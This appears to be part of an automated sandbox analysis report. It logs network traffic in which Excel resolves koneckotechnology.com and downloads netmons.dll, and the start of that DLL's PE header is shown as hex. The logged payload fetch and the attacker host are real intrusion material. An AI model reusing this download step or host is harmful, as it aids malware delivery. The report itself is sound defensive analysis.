May 12, 2021 18:42:57.225550890 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225595951 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225615025 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225652933 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225670099 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225708961 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225723028 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225761890 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225775003 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225816011 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225821972 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225861073 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225873947 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225913048 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225924969 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.225966930 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.225975037 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226015091 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226033926 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226073980 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226087093 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226126909 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226141930 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226181030 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226201057 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226244926 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226260900 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226300001 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226317883 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226363897 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226377010 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226417065 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226445913 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226485968 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226506948 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226567030 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226577044 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226619959 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226641893 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226684093 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226699114 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226738930 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226758957 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226795912 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226814032 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226854086 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226875067 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226911068 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226932049 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.226969004 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.226984978 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227020025 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227037907 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227073908 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227091074 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227128029 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227143049 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227178097 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227196932 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227231979 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227250099 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227283955 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227308989 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227344036 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227365017 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227400064 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227416992 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227451086 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227469921 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227523088 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227536917 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227572918 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227591038 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227631092 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227643967 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227679968 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227698088 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227734089 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227751017 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227788925 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227803946 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227852106 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227859020 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227900982 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227919102 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.227957964 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.227974892 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228014946 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228028059 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228064060 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228084087 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228118896 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228137016 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228172064 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228189945 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228224993 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228240967 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228269100 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228281021 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228296041 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228329897 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228355885 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228390932 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228410006 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228450060 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228465080 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228502035 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228514910 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228552103 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228573084 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228610992 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228627920 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228663921 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228679895 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228724003 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228724957 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228771925 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228806019 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228821993 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228857994 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228876114 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228910923 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228929996 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.228982925 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.228982925 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229021072 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229044914 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229082108 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229101896 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229139090 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229154110 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229187012 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229207993 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229243040 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229262114 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229295969 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229315042 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229355097 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229367018 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229441881 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229450941 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229495049 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229501963 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229533911 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229563951 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229619026 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229640961 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229656935 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229671001 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229707003 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229723930 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229759932 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229779005 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229815006 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229832888 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229871988 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.229887009 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.229924917 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.234891891 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.235783100 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.405807972 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.405842066 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.405855894 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.405877113 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.405894995 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.405910969 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.405931950 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.405951023 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.405967951 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.405983925 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406001091 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406007051 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406018972 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406034946 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406035900 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406049013 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406056881 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406075954 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406090975 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406095028 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406106949 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406117916 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406125069 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406141996 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406156063 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406162024 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406179905 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406188011 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406223059 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406233072 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406253099 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406261921 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406271935 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406287909 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406287909 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406306028 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406320095 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406323910 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406347036 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406356096 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406364918 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406382084 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406384945 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406402111 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406410933 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406420946 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406438112 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406443119 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406455040 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406471968 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406481981 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406487942 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406505108 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406510115 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406523943 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406543016 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406552076 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406560898 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406577110 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406578064 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406594992 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406606913 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406611919 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406629086 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406639099 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406646967 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406663895 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406675100 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406685114 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406699896 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406703949 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406721115 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406735897 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406738043 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406754971 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406769037 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406771898 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406789064 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406801939 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406805992 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406826973 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406836987 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406845093 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406862020 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406869888 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406878948 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406896114 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406898022 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406912088 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:42:57.406928062 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:42:57.406960964 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:43:27.214674950 CEST	80	49167	198.54.114.131	192.168.2.22
May 12, 2021 18:43:27.214852095 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:44:55.356386900 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:44:55.932852030 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:44:56.931325912 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:44:58.897468090 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:45:02.828706980 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:45:10.676228046 CEST	49167	80	192.168.2.22	198.54.114.131
May 12, 2021 18:45:26.355540991 CEST	49167	80	192.168.2.22	198.54.114.131

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2021 18:42:55.414016962 CEST	52197	53	192.168.2.22	8.8.8.8
May 12, 2021 18:42:55.474991083 CEST	53	52197	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 12, 2021 18:42:55.414016962 CEST	192.168.2.22	8.8.8.8	0xfc39	Standard query (0)	koneckotechnology.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 12, 2021 18:42:55.474991083 CEST	8.8.8.8	192.168.2.22	0xfc39	No error (0)	koneckotechnology.com		198.54.114.131	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

koneckotechnology.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	198.54.114.131	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
May 12, 2021 18:42:55.683294058 CEST	0	OUT	GET /netmons.dll HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: koneckotechnology.com Connection: Keep-Alive
May 12, 2021 18:42:55.879472971 CEST	2	IN	HTTP/1.1 200 OK date: Wed, 12 May 2021 16:42:55 GMT server: Apache last-modified: Wed, 12 May 2021 13:22:52 GMT accept-ranges: bytes content-length: 643072 content-type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 5d 9f e5 23 3c f1 b6 23 3c f1 b6 23 3c f1 b6 a0 34 ae b6 29 3c f1 b6 d9 1f e8 b6 25 3c f1 b6 30 34 ac b6 21 3c f1 b6 26 30 fe b6 38 3c f1 b6 26 30 ae b6 a9 3c f1 b6 23 3c f0 b6 62 3e f1 b6 a0 34 ac b6 30 3c f1 b6 26 30 91 b6 57 3c f1 b6 26 30 ad b6 22 3c f1 b6 cf 37 af b6 22 3c f1 b6 26 30 ab b6 22 3c f1 b6 52 69 63 68 23 3c f1 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c1 ab 9b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 07 0a 00 80 02 00 00 40 07 00 00 00 00 00 9a f2 00 00 00 10 00 00 00 90 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 3e 03 00 45 00 00 00 5c 21 03 00 04 01 00 00 00 a0 03 00 7c cf 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 09 00 80 34 00 00 a0 95 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e6 02 00 48 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 94 05 00 00 d4 20 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 78 02 00 00 10 00 00 00 80 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 ae 00 00 00 90 02 00 00 b0 00 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 59 00 00 00 40 03 00 00 30 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c cf 05 00 00 a0 03 00 00 d0 05 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 04 81 00 00 00 70 09 00 00 90 00 00 00 40 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$g]#<#<#<4)<%<04!<&08<&0<#<b>40<&0W<&0"<7"<&0"<Rich#<PEL`!@>E\!\|p4H @.textx `.rdataU@@.dataY@0@@.rsrc\|p@@.relocp@@B
May 12, 2021 18:42:55.879513025 CEST	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
May 12, 2021 18:42:55.879534006 CEST	4	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
